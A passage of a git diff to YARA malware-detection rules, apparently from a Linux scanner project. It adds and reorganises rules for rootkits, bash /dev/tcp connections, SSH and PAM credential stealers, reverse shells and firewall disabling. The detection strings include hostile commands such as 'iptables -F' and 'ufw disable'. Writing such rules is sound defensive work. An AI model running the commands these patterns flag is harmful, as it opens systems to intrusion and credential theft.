+ description = "userland rootkit designed to hide processes"
+ ref = "prochid.c"
+ hash_2023_OK_c38c = "c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a"
+ hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
+ hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
+
+ strings:
+ $f_proc_self_fd = "/proc/self/fd/%d"
+ $f_proc_stat = "/proc/%s/stat"
+ $f_readdir = "readdir"
+ $f_dlsym = "dlsym"
+ $f_readlink = "readlink"
+ $x_hide_process = "hide_proc" fullword
+ $x_proc_hide = "proc_hide" fullword
+ $x_process_hide = "process_hide" fullword
+ $x_process_hiding = "process_hiding" fullword
+ $x_hidden_proc = "hidden_proc" fullword
+ $x_prochide = "processhide"
+ $x_process_to_filter = "process_to_filter"
+ $x_old_readdir = "old_readdir"
+ $x_orig_readdir = "orig_readdir"
+ $x_original_readdir = "original_readdir"
+ $x_readdirOriginal = "readdirOriginal"
+ $x_backdoor = "backdoor" fullword
+ $x_is_hidden = "is_hidden" fullword
+ $x_hidden_gid = "HIDDEN_GID" fullword
+ $x_revshell = "revshell" fullword
+ $x_cmdline = "/proc/self/cmdline"
+ $not_bpf = "/sys/fs/bpf"
+
+ condition:
+ filesize < 250KB and all of ($f*) and any of ($x*) and none of ($not*)
+}
+
+rule process_hider: high {
+ meta:
+ description = "possible userland rootkit designed to hide processes"
+
+ strings:
+ $hide_process = "hide_proc" fullword
+ $proc_hide = "proc_hide" fullword
+ $process_hide = "process_hide" fullword
+ $process_hiding = "process_hiding" fullword
+ $hidden_proc = "hidden_proc" fullword
+
+ condition:
+ filesize < 250KB and any of them
+}
diff --git a/rules/evasion/hidden_paths/relative-hidden.yara b/rules/exec/program/hidden.yara
similarity index 91%
rename from rules/evasion/hidden_paths/relative-hidden.yara
rename to rules/exec/program/hidden.yara
index 2797027c3..6c76d9529 100644
--- a/rules/evasion/hidden_paths/relative-hidden.yara
+++ b/rules/exec/program/hidden.yara
@@ -1,4 +1,4 @@
-rule relative_hidden_launcher {
+rule relative_hidden_launcher: medium {
strings:
$relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword
$x_exec = "exec"
diff --git a/rules/exec/shell/bash_dev_tcp.yara b/rules/exec/shell/bash_dev_tcp.yara
index 7df0c2aeb..d0bc02be4 100644
--- a/rules/exec/shell/bash_dev_tcp.yara
+++ b/rules/exec/shell/bash_dev_tcp.yara
@@ -1,16 +1,14 @@
rule bash_dev_tcp: high exfil {
meta:
- description = "uses /dev/tcp for network access (bash)"
- hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
- hash_2023_usr_adxintrin_b = "a51a4ddcd092b102af94139252c898d7c1c48f322bae181bd99499a79c12c500"
- hash_2023_spirit = "26ba215bcd5d8a9003a904b0eac7dc10054dba7bea9a708668a5f6106fd73ced"
+ description = "uses /dev/tcp for network access (bash)"
strings:
- $ref = "/dev/tcp"
+ $ref = /\/dev\/tcp[\/\w\.]{8,16}\/\d{1,6}/
$posixly_correct = "POSIXLY_CORRECT"
$not_comment = "# Check that both our processes are running on their tcp port"
$not_get = /GET \/ HTTP\/1.1\n{1,2} >/
$not_localhost_8080 = "/dev/tcp/127.0.0.1/8080"
+ $not_lsof = "/proc/tcp" fullword
condition:
$ref and not $posixly_correct and none of ($not*)
diff --git a/rules/exec/shell/nohup.yara b/rules/exec/shell/nohup.yara
index b42dc1a00..a11f35f9c 100644
--- a/rules/exec/shell/nohup.yara
+++ b/rules/exec/shell/nohup.yara
@@ -36,21 +36,6 @@ rule elf_nohup: high {
uint32(0) == 1179403647 and filesize < 1MB and any of ($nohup*) and none of ($not*)
}
-rule trap_1: high {
- meta:
- description = "Protects itself from early termination via SIGHUP"
- hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3"
- hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185"
- hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7"
-
- strings:
- $ref = "trap '' 1"
- $ref2 = "trap \"\" 1"
-
- condition:
- any of them
-}
-
rule nohup_bash: high {
meta:
description = "Calls bash with nohup"
diff --git a/rules/exec/shell/sighup_trap.yara b/rules/exec/shell/sighup_trap.yara
new file mode 100644
index 000000000..235b5d272
--- /dev/null
+++ b/rules/exec/shell/sighup_trap.yara
@@ -0,0 +1,15 @@
+rule trap_1: high {
+ meta:
+ description = "Protects itself from early termination via SIGHUP"
+ hash_2023_Linux_Malware_Samples_3059 = "305901aa920493695729132cfd20cbddc9db2cf861071450a646c6a07b4a50f3"
+ hash_2023_Linux_Malware_Samples_553a = "553ac527d6a02a84c787fd529ea59ce1eb301ddfb180d89b9e62108d92894185"
+ hash_2023_Linux_Malware_Samples_7a60 = "7a60c84fb34b2b3cd7eed3ecd6e4a0414f92136af656ed7d4460b8694f2357a7"
+
+ strings:
+ $ref = "trap '' 1"
+ $ref2 = "trap \"\" 1"
+ $not_netcat_example = "ignore most signals; the parent will nuke the kid"
+
+ condition:
+ any of ($ref*) and none of ($not*)
+}
diff --git a/rules/exfil/stealer/pam.yara b/rules/exfil/stealer/pam.yara
index 4c7fa9238..1513b5e57 100644
--- a/rules/exfil/stealer/pam.yara
+++ b/rules/exfil/stealer/pam.yara
@@ -14,14 +14,15 @@ rule pam_passwords: high {
$f_orig_auth = "orig_pam_authenticate"
$f_getifaddrs = "getifaddrs" fullword
$f_keylogger = "keylogger"
- $f_tmp = "/tmp/"
+ $f_tmp = /\/tmp\/[\.\w\-]{2,}/
$f_ssh = "/bin/ssh"
+ $f_sshpass = "sshpass"
$f_sendto = "sendto" fullword
$not_pam_service = "--pam-service"
$not_pam_acct = "pam_acct_mgmt"
condition:
- $auth and $pass and 2 of ($f*) and none of ($not*)
+ $auth and $pass and 3 of ($f*) and none of ($not*)
}
rule pam_passwords_rootkit: critical {
diff --git a/rules/exfil/stealer/ssh.yara b/rules/exfil/stealer/ssh.yara
index 008799cce..6fb58f29d 100644
--- a/rules/exfil/stealer/ssh.yara
+++ b/rules/exfil/stealer/ssh.yara
@@ -48,3 +48,25 @@ rule stealssh: critical {
condition:
filesize < 10MB and $folder and any of ($steal*)
}
+
+rule sshd_tmp_policy: high {
+ meta:
+ description = "adjusts sshd tmp policy, possibly to dump credentials"
+
+ strings:
+ $unconfined = "unconfined_u:object_r:sshd_tmp_t:s0"
+
+ condition:
+ any of them
+}
+
+rule ssh_pass_file: high {
+ meta:
+ description = "may store SSH passwords"
+
+ strings:
+ $unconfined = /sshpass\w\.txt/
+
+ condition:
+ any of them
+}
diff --git a/rules/false_positives/libdw.yara b/rules/false_positives/libdw.yara
new file mode 100644
index 000000000..17fc183d8
--- /dev/null
+++ b/rules/false_positives/libdw.yara
@@ -0,0 +1,11 @@
+rule libdw_override: override {
+ meta:
+ description = "libdw.so"
+ ptrace_injector = "medium"
+
+ strings:
+ $dward = "invalid DWARF"
+
+ condition:
+ filesize < 2MB and any of them
+}
diff --git a/rules/false_positives/slirp.yara b/rules/false_positives/slirp.yara
index 50032a2e1..87550ab83 100644
--- a/rules/false_positives/slirp.yara
+++ b/rules/false_positives/slirp.yara
@@ -3,6 +3,7 @@ rule slirp4netns: override linux {
description = "slirp4netns"
login_records = "medium"
linux_critical_system_paths_high = "medium"
+ fetch_tool = "medium"
strings:
$auth = "SLIRP_DEBUG"
diff --git a/rules/false_positives/snapd.yara b/rules/false_positives/snapd.yara
index 3ef08dc4b..ffc913462 100644
--- a/rules/false_positives/snapd.yara
+++ b/rules/false_positives/snapd.yara
@@ -7,12 +7,15 @@ rule snapd: override linux {
dev_mmc = "medium"
busybox_runner = "medium"
system_log_references = "medium"
+ hidden_x11 = "medium"
filetypes = "elf,so"
strings:
$snapd_snapd = "SNAPD_SNAPD"
$snapd = "snapcore/snapd"
+ $snapd_debug = "SNAPD_DEBUG"
+ $snap_name = "SNAP_NAME" fullword
condition:
- filesize > 15MB and filesize < 30MB and uint32(0) == 1179403647 and any of them
+ filesize > 1MB and filesize < 30MB and uint32(0) == 1179403647 and any of them
}
diff --git a/rules/false_positives/sudo.yara b/rules/false_positives/sudo.yara
index bd3f714f8..0fda2af79 100644
--- a/rules/false_positives/sudo.yara
+++ b/rules/false_positives/sudo.yara
@@ -1,10 +1,13 @@
rule sudo: override linux {
meta:
- description = "sudo"
- proc_exe = "medium"
+ description = "sudo"
+ proc_c_exe = "medium"
+ small_elf_sudoer = "medium"
+ proc_d_exe_high = "medium"
strings:
- $ref = "SUDO_INTERCEPT_FD"
+ $ref = "SUDO_INTERCEPT_FD"
+ $ref2 = "SUDO_EDITOR"
condition:
any of them
diff --git a/rules/false_positives/vmtools.yara b/rules/false_positives/vmtools.yara
index bec7a593e..2d5888698 100644
--- a/rules/false_positives/vmtools.yara
+++ b/rules/false_positives/vmtools.yara
@@ -3,10 +3,14 @@ rule vmtools: override {
description = "vmtools"
backdoor = "medium"
linux_critical_system_paths_high = "medium"
+ proc_net_route_high = "medium"
+ proc_s_exe = "medium"
+ sys_net_recon_exfil = "medium"
strings:
- $vmtools = "VMTools_LoadConfig" fullword
+ $vmtools = "VMTools" fullword
$vmsupport = "VMSUPPORT" fullword
+ $vmware = "VMware" fullword
condition:
filesize < 1MB and uint32(0) == 1179403647 and any of them
diff --git a/rules/fs/permission/permission-modify-dangerous.yara b/rules/fs/permission/permission-modify-dangerous.yara
index 8af721630..5762cbc6a 100644
--- a/rules/fs/permission/permission-modify-dangerous.yara
+++ b/rules/fs/permission/permission-modify-dangerous.yara
@@ -22,6 +22,7 @@ rule chmod_dangerous_exec: high exfil {
$not_chmod_01777 = "chmod 01777"
$not_chromium = "CHROMIUM_TIMESTAMP"
$not_var_tmp = "chmod 0777 /var/tmp" fullword
+ $not_extutils = "chmod 0777, [.foo.bar] doesn't work on VMS"
condition:
filesize < 50MB and $ref and none of ($not*)
diff --git a/rules/fs/proc/arbitrary-pid.yara b/rules/fs/proc/arbitrary-pid.yara
index 47419fd05..def32edf6 100644
--- a/rules/fs/proc/arbitrary-pid.yara
+++ b/rules/fs/proc/arbitrary-pid.yara
@@ -6,10 +6,10 @@ rule proc_arbitrary: medium {
hash_2023_Downloads_98e7 = "98e7808bd5bfd72c08429ffe0ffb52ae54bce7e6389f17ae523e8ae0099489ab"
strings:
- $string_val = /\/proc\/[%{$][\/\$\w\}]{0,12}/
+ $ref = /\/proc\/[%{$][\/\$\w\}]{0,12}/
condition:
- any of them
+ $ref
}
rule pid_match: medium {
diff --git a/rules/fs/proc/pid-exe.yara b/rules/fs/proc/pid-exe.yara
index 44496b6ce..6342a7595 100644
--- a/rules/fs/proc/pid-exe.yara
+++ b/rules/fs/proc/pid-exe.yara
@@ -1,13 +1,51 @@
-rule proc_exe: high {
+rule proc_s_exe: high {
meta:
- description = "accesses underlying executable of other processes"
- hash_2023_OK_4f5c = "4f5cfb805feb7576e594f1bb3b773ba0ca80e09e49bfb7e3507f815f774ac62d"
- hash_2023_Pupy_2ab5 = "2ab59fa690e502a733aa1500a96d8e94ecb892ed9d59736cca16a09538ce7d77"
- hash_2023_Unix_Dropper_Mirai_58c5 = "58c54ded0af2fffb8cea743d8ec3538cecfe1afe88d5f7818591fb5d4d2bd4e1"
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $string = "/proc/%s/exe" fullword
+ $not_tool = /[Uu]sage:/ fullword
+
+ condition:
+ $string and none of ($not*)
+}
+
+rule proc_d_exe: medium {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $digit = "/proc/%d/exe" fullword
+ $not_cgroup = "cgroup" fullword
+ $not_tool = /[Uu]sage:/ fullword
+
+ condition:
+ $digit and none of ($not*)
+}
+
+rule proc_d_exe_high: high {
+ meta:
+ description = "accesses underlying executable of other processes"
+
+ strings:
+ $ref = "/proc/%d/exe" fullword
+
+ $o_sign = "/etc/init.d"
+ $o_net_dev = "/proc/net/dev"
+ $o_bash = "/bin/bash"
+ $o_tty = "/dev/tty"
+ $o_var_tmp = "/var/tmp"
+ $o_osrelease = "/proc/sys/kernel/osrelease"
+
+ condition:
+ filesize < 5MB and $ref and any of ($o*)
+}
+
+rule proc_py_exe: high {
+ meta:
+ description = "accesses underlying executable of other processes"
strings:
- $string = "/proc/%s/exe" fullword
- $digit = "/proc/%d/exe" fullword
$python = "/proc/{}/exe" fullword
condition:
diff --git a/rules/hw/dev/kmem.yara b/rules/hw/dev/kmem.yara
index 0f555caba..5110cda09 100644
--- a/rules/hw/dev/kmem.yara
+++ b/rules/hw/dev/kmem.yara
@@ -9,6 +9,7 @@ rule kmem: high bsd {
// entries from include/paths.h
$not_cshell = "_PATH_CSHELL" fullword
$not_rwho = "_PATH_RWHODIR" fullword
+ $not_lsof = "lsof" fullword
condition:
$val and none of ($not*)
diff --git a/rules/hw/dev/sd_mmc.yara b/rules/hw/dev/sd_mmc.yara
index 7ae5710b3..939fa1d9e 100644
--- a/rules/hw/dev/sd_mmc.yara
+++ b/rules/hw/dev/sd_mmc.yara
@@ -4,9 +4,22 @@ rule dev_mmc: high {
description = "access raw SD/MMC devices"
strings:
- $val = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
- $block_val = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_mmc = /\/dev\/mmcblk[\$%\w\{\}]{0,16}/
+ $dev_block = /\/dev\/block\/mmcblk[\$%\w\{\}]{0,16}/
condition:
- filesize < 10MB and any of them
+ filesize < 10MB and any of ($dev*)
+}
+
+rule dev_mmc_ok: override {
+ meta:
+ dev_mmc = "medium"
+
+ strings:
+ $not_fwupd = "fu_firmware_set_id"
+ $not_ipmi = "/dev/ipmi"
+ $not_grub = "GRUB" fullword
+
+ condition:
+ dev_mmc and any of them
}
diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara
index 5ee50137e..11af74d4f 100644
--- a/rules/hw/dev/ubi.yara
+++ b/rules/hw/dev/ubi.yara
@@ -9,3 +9,17 @@ rule ubi: high linux {
condition:
any of them
}
+
+rule expected_ubi_users: override {
+ meta:
+ ubi = "medium"
+
+ strings:
+ $libuboot = "libuboot"
+ $usage = "Usage:"
+ $ubi = "ubifs" fullword
+ $UBI = "UBI version"
+
+ condition:
+ filesize < 512KB and ubi and any of them
+}
diff --git a/rules/impact/degrade/firewall.yara b/rules/impact/degrade/firewall.yara
new file mode 100644
index 000000000..86076f55d
--- /dev/null
+++ b/rules/impact/degrade/firewall.yara
@@ -0,0 +1,93 @@
+import "math"
+
+rule selinux_firewall: high linux {
+ meta:
+ hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97"
+ hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed"
+ hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f"
+ filetypes = "elf,so"
+ description = "references both SELinux and iptables/firewalld"
+
+ strings:
+ $selinux = /SELINUX[=\w]{0,32}/ fullword
+ $f_iptables = /iptables[ -\w]{0,32}/
+ $f_firewalld = /[\w ]{0,32}firewalld/
+ $not_ip6tables = "NFTNL_RULE_TABLE"
+ $not_iptables = "iptables-restore"
+ $not_iptables_nft = "iptables-nft"
+ $not_selinux_init = "SELINUX_INIT"
+ $not_define = "#define" fullword
+ $not_netlink = "NETLINK" fullword
+ $not_containerd = "containerd" fullword
+
+ condition:
+ filesize < 1MB and $selinux and any of ($f*) and none of ($not*)
+}
+
+import "math"
+
+private rule ufw_tool {
+ strings:
+ $not_route = "route-insert"
+ $not_statusverbose = "statusverbose"
+ $not_enables_the = "enables the"
+ $not_enable_the = "enable the"
+ $not_enable = "ufw enable"
+
+ condition:
+ filesize < 256KB and any of them
+}
+
+rule ufw_disable_word: high {
+ meta:
+ description = "disables ufw firewall"
+
+ strings:
+ $ref = /ufw['", ]{1,4}disable/ fullword
+
+ condition:
+ filesize < 256KB and $ref and not ufw_tool
+}
+
+rule iptables_disable: high {
+ meta:
+ description = "disables iptables firewall"
+
+ strings:
+ $input = "iptables -P INPUT ACCEPT"
+ $output = "iptables -P OUTPUT ACCEPT"
+ $forward = "iptables -P FORWARD ACCEPT"
+ $flush = "iptables -F"
+
+ condition:
+ filesize < 1MB and 3 of them
+}
+
+rule netsh_firewall: high windows {
+ meta:
+ description = "adds exception to Windows netsh firewall"
+
+ strings:
+ $netsh = "netsh"
+ $firewall = "firewall"
+ $firewall2 = "advfirewall"
+ $allowedprogram = /allowedprogram.{0,64}ENABLE/
+
+ condition:
+ $netsh and any of ($firewall*) and $allowedprogram
+}
+
+rule netsh_firewall_split: high windows {
+ meta:
+ description = "adds exception to Windows netsh firewall"
+
+ strings:
+ $netsh = "netsh"
+ $firewall = "firewall"
+ $firewall2 = "advfirewall"
+ $allowedprogram = "allowedprogram"
+ $ENABLE = "ENABLE"
+
+ condition:
+ filesize < 5MB and $netsh and any of ($firewall*) and $allowedprogram and $ENABLE
+}
diff --git a/rules/impact/degrade/iptables.yara b/rules/impact/degrade/iptables.yara
deleted file mode 100644
index 162b11189..000000000
--- a/rules/impact/degrade/iptables.yara
+++ /dev/null
@@ -1,16 +0,0 @@
-import "math"
-
-rule iptables_disable: high {
- meta:
- description = "disables iptables firewall"
-
- strings:
- $input = "iptables -P INPUT ACCEPT"
- $output = "iptables -P OUTPUT ACCEPT"
- $forward = "iptables -P FORWARD ACCEPT"
- $flush = "iptables -F"
-
- condition:
- filesize < 1MB and 3 of them
-}
-
diff --git a/rules/impact/degrade/selinux_firewall.yara b/rules/impact/degrade/selinux_firewall.yara
deleted file mode 100644
index 5e86a102a..000000000
--- a/rules/impact/degrade/selinux_firewall.yara
+++ /dev/null
@@ -1,22 +0,0 @@
-rule selinux_firewall: high linux {
- meta:
- hash_2023_Unix_Downloader_Rocke_228e = "228ec858509a928b21e88d582cb5cfaabc03f72d30f2179ef6fb232b6abdce97"
- hash_2023_Unix_Downloader_Rocke_2f64 = "2f642efdf56b30c1909c44a65ec559e1643858aaea9d5f18926ee208ec6625ed"
- hash_2023_Unix_Downloader_Rocke_6107 = "61075056b46d001e2e08f7e5de3fb9bfa2aabf8fb948c41c62666fd4fab1040f"
- filetypes = "elf,so"
- description = "references both SELinux and iptables/firewalld"
-
- strings:
- $selinux = /SELINUX[=\w]{0,32}/ fullword
- $f_iptables = /iptables[ -\w]{0,32}/
- $f_firewalld = /[\w ]{0,32}firewalld/
- $not_ip6tables = "NFTNL_RULE_TABLE"
- $not_iptables = "iptables-restore"
- $not_iptables_nft = "iptables-nft"
- $not_selinux_init = "SELINUX_INIT"
- $not_define = "#define" fullword
- $not_netlink = "NETLINK" fullword
-
- condition:
- filesize < 1MB and $selinux and any of ($f*) and none of ($not*)
-}
diff --git a/rules/impact/degrade/ufw.yara b/rules/impact/degrade/ufw.yara
deleted file mode 100644
index 113440907..000000000
--- a/rules/impact/degrade/ufw.yara
+++ /dev/null
@@ -1,24 +0,0 @@
-import "math"
-
-private rule ufw_tool {
- strings:
- $not_route = "route-insert"
- $not_statusverbose = "statusverbose"
- $not_enables_the = "enables the"
- $not_enable_the = "enable the"
- $not_enable = "ufw enable"
-
- condition:
- filesize < 256KB and any of them
-}
-
-rule ufw_disable_word: high {
- meta:
- description = "disables ufw firewall"
-
- strings:
- $ref = /ufw['", ]{1,4}disable/ fullword
-
- condition:
- filesize < 256KB and $ref and not ufw_tool
-}
diff --git a/rules/impact/exploit/GCONV_PATH.yara b/rules/impact/exploit/GCONV_PATH.yara
index f086ac0f1..ffb449398 100644
--- a/rules/impact/exploit/GCONV_PATH.yara
+++ b/rules/impact/exploit/GCONV_PATH.yara
@@ -1,4 +1,4 @@
-rule gconv_path: low {
+rule gconv_path: harmless {
meta:
description = "references character conversion configuration"
diff --git a/rules/impact/exploit/exploit.yara b/rules/impact/exploit/exploit.yara
index fb1e92b08..593214103 100644
--- a/rules/impact/exploit/exploit.yara
+++ b/rules/impact/exploit/exploit.yara
@@ -24,6 +24,18 @@ rule exploitation: medium {
any of ($ref*) and none of ($not*) and not legal_license
}
+rule Exploit: medium {
+ meta:
+ description = "References an exploit"
+
+ strings:
+ $ref6 = "Exploit" fullword
+ $not_reduction = "Exploit reduction"
+
+ condition:
+ any of ($ref*) and none of ($not*) and not legal_license
+}
+
rule exploiter: high {
meta:
description = "References an exploit"
@@ -36,7 +48,6 @@ rule exploiter: high {
$ref3 = "sploit" fullword
$ref4 = "spl0it" fullword
$ref5 = "pop a shell" fullword
- $ref6 = "Exploit" fullword
$not_ms_example = "Drive-by Compromise"
condition:
diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara
index 35203ede1..bdc825193 100644
--- a/rules/impact/remote_access/backdoor.yara
+++ b/rules/impact/remote_access/backdoor.yara
@@ -10,7 +10,7 @@ private rule wordlist {
filesize < 100MB and 3 of them
}
-rule backdoor: high {
+rule backdoor: medium {
meta:
description = "References a 'backdoor'"
hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2"
@@ -20,8 +20,12 @@ rule backdoor: high {
strings:
$ref = /[a-zA-Z\-_ \']{0,16}[bB]ackdoor[a-zA-Z\-_ ]{0,16}/ fullword
+ $not_vcpu = "VCPUInfoBackdoor"
+ $not_vmware = "gGuestBackdoorOps"
+ $not_comment = "# backdoor:"
+
condition:
- filesize < 40MB and any of them and not wordlist
+ filesize < 40MB and any of them and not wordlist and none of ($not*)
}
rule backdoor_caps: high {
diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara
index b6062c164..898e16df1 100644
--- a/rules/impact/remote_access/botnet.yara
+++ b/rules/impact/remote_access/botnet.yara
@@ -1,13 +1,13 @@
rule bot: medium {
meta:
- description = "References a 'botnet'"
+ description = "References a 'bot'"
strings:
- $bot_deployed = "bot deployed"
- $botnet = "Botnet"
+ $BOTDIR = "BOTDIR"
+ $botdir = "botdir"
condition:
- filesize < 20MB and any of them
+ filesize < 1MB and any of them
}
rule botnet_high: high {
diff --git a/rules/impact/remote_access/listen_shell.yara b/rules/impact/remote_access/listen_shell.yara
index 3c5c11ec9..33d14bb3b 100644
--- a/rules/impact/remote_access/listen_shell.yara
+++ b/rules/impact/remote_access/listen_shell.yara
@@ -1,4 +1,4 @@
-rule listens_and_executes_shell: high {
+rule listens_and_executes_shell: medium {
meta:
description = "Listens at a port and executes shells"
hash_2024_Downloads_8cad = "8cad755bcf420135c0f406fb92138dcb0c1602bf72c15ed725bd3b76062dafe5"
@@ -22,9 +22,12 @@ rule listens_and_executes_shell: high {
$sh_cmd = "cmd.exe"
$not_setlocale = "setlocale" fullword
$not_ptrace = "ptrace" fullword
+ $not_image_jpeg = "image/jpeg"
+ $not_openpgp = "openpgp"
+ $not_dbus = "dbus" fullword
condition:
- filesize < 10MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*)
+ filesize < 3MB and any of ($f_sock*) and any of ($f_exec*) and any of ($f_inet*) and any of ($f_listen*) and any of ($sh*) and none of ($not*)
}
rule go_tcp_listen_and_exec_shell: high {
diff --git a/rules/impact/remote_access/net_term.yara b/rules/impact/remote_access/net_term.yara
index 46253ad95..93a5f3c99 100644
--- a/rules/impact/remote_access/net_term.yara
+++ b/rules/impact/remote_access/net_term.yara
@@ -84,16 +84,18 @@ rule miner_kvryr_stak_alike: high {
hash_2023_Linux_Malware_Samples_39c3 = "39c33c261899f2cb91f686aa6da234175237cd72cfcd9291a6e51cbdc86d4def"
strings:
- $upload = "upload"
- $shell = "shell" fullword
- $bin_sh = "/bin/"
- $tcsetattr = "tcsetattr"
- $termios = "termios" fullword
- $execve = "execve"
- $numa = "NUMA"
+ $f_upload = "upload"
+ $f_shell = "shell" fullword
+ $f_bin_sh = "/bin/"
+ $f_tcsetattr = "tcsetattr"
+ $f_termios = "termios" fullword
+ $f_execve = "execve"
+ $f_numa = "NUMA"
+
+ $not_perf = "PERF_RECORD"
condition:
- filesize < 12MB and all of them
+ filesize < 12MB and all of ($f*) and none of ($not*)
}
rule proxy_http_aes_terminal_combo: medium {
diff --git a/rules/impact/remote_access/py_setuptools.yara b/rules/impact/remote_access/py_setuptools.yara
index f58daf7d9..15134cf47 100644
--- a/rules/impact/remote_access/py_setuptools.yara
+++ b/rules/impact/remote_access/py_setuptools.yara
@@ -14,7 +14,7 @@ private rule pythonSetup {
$not_distutils = "from distutils.errors import"
condition:
- filesize < 128KB and $setup and any of ($i*) and none of ($not*)
+ filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*)
}
rule setuptools_oslogin: medium {
diff --git a/rules/impact/remote_access/reverse_shell.yara b/rules/impact/remote_access/reverse_shell.yara
index dbaaa9df1..457354201 100644
--- a/rules/impact/remote_access/reverse_shell.yara
+++ b/rules/impact/remote_access/reverse_shell.yara
@@ -32,8 +32,10 @@ rule possible_reverse_shell: medium {
$sh_bash = "/bin/bash"
$sh = "/bin/sh"
+ $not_uc2 = "ucs2reverse"
+
condition:
- filesize < 4MB and any of ($sh*) and all of ($f*)
+ filesize < 4MB and any of ($sh*) and all of ($f*) and none of ($not*)
}
rule mkfifo_netcat: critical {
diff --git a/rules/impact/rootkit/readdir-interceptor.yara b/rules/impact/rootkit/readdir-interceptor.yara
deleted file mode 100644
index 63864c70a..000000000
--- a/rules/impact/rootkit/readdir-interceptor.yara
+++ /dev/null
@@ -1,65 +0,0 @@
-rule readdir_intercept: high {
- meta:
- description = "userland rootkit designed to hide files (readdir64)"
- hash_2023_lib_pkit = "8faa04955eeb6f45043003e23af39b86f1dbfaa12695e0e1a1f0bc7a15d0d116"
- hash_2023_lib_pkitarm = "67de6ba64ee94f2a686e3162f2563c77a7d78b7e0404e338a891dc38ced5bd71"
- hash_2023_lib_skit = "427b1d16f16736cf8cee43a7c54cd448ca46ac9b573614def400d2d8d998e586"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $not_ld_debug = "LD_DEBUG"
- $not_libc = "getusershell"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*) and none of ($not*)
-}
-
-rule readdir_tcp_wrapper_intercept: high {
- meta:
- description = "userland rootkit designed to hide files and bypass tcp-wrappers"
- ref = "https://github.com/ldpreload/Medusa"
- filetypes = "so,c"
-
- strings:
- $r_new65 = "readdir64" fullword
- $r_old64 = "_readdir64"
- $r_new32 = "readdir" fullword
- $r_old32 = "_readdir"
- $r_hosts_access = "hosts_access"
-
- condition:
- filesize < 2MB and uint32(0) == 1179403647 and all of ($r*)
-}
-
-rule readdir_intercept_source: high {
- meta:
- description = "userland rootkit source designed to hide files (DECLARE_READDIR)"
- filetypes = "so,c"
-
- strings:
- $declare = "DECLARE_READDIR"
- $hide = "hide"
-
- condition:
- filesize < 200KB and all of them
-}
-
-rule lkm_dirent: high {
- meta:
- description = "kernel rootkit designed to hide files (linux_dirent)"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "so"
-
- strings:
- $l_dirent = "linux_dirent"
- $linux = "Linux"
- $not_syscalls = "#define _LINUX_SYSCALLS_H"
- $not_itimer = "__kernel_old_itimerval"
-
- condition:
- filesize < 2MB and all of ($l*) and none of ($not*)
-}
diff --git a/rules/lateral/scan/scan_tool.yara b/rules/lateral/scan/scan_tool.yara
index eb3018d43..2a62612a9 100644
--- a/rules/lateral/scan/scan_tool.yara
+++ b/rules/lateral/scan/scan_tool.yara
@@ -7,18 +7,33 @@ rule generic_scan_tool: medium {
strings:
$f_gethostbyname = "gethostbyname"
- $f_socket = "socket"
- $f_connect = "connect"
+ $f_ip = "%d.%d.%d.%d" fullword
+ $f_socket = "socket" fullword
+ $f_connect = "connect" fullword
$o_banner = "banner"
$o_Probe = "Probe"
$o_probe = "probe"
$o_scan = "scan"
$o_port = "port"
$o_target = "target"
+ $o_Port = "Port"
+ $o_Target = "Target"
$not_nss = "NSS_USE_SHEXP_IN_CERT_NAME"
$not_microsoft = "Microsoft Corporation"
$not_php_reference = "ftp_nb_put"
condition:
- all of ($f*) and 2 of ($o*) and none of ($not*)
+ 3 of ($f*) and 2 of ($o*) and none of ($not*)
+}
+
+rule root_scan_tool: high {
+ meta:
+ description = "may try to get root on other systems"
+
+ strings:
+ $root_the = /[\w \.]{0,32}root the [\w \.\%]{0,32}/
+ $r00t = /[\w \.]{0,32}r00t[\w \.]{0,32}/
+
+ condition:
+ filesize < 20MB and generic_scan_tool and any of them
}
diff --git a/rules/malware/family/medusa.yara b/rules/malware/family/medusa.yara
index 59cae14cf..5701a3647 100644
--- a/rules/malware/family/medusa.yara
+++ b/rules/malware/family/medusa.yara
@@ -14,7 +14,8 @@ rule medusa: critical linux {
$rkload = "rkload" fullword
$wcs = "wcsmbsload" fullword
$readdir64 = "readdir64" fullword
+ $backup_ld = "backup_ld" fullword
condition:
- filesize < 2MB and 80 % of them
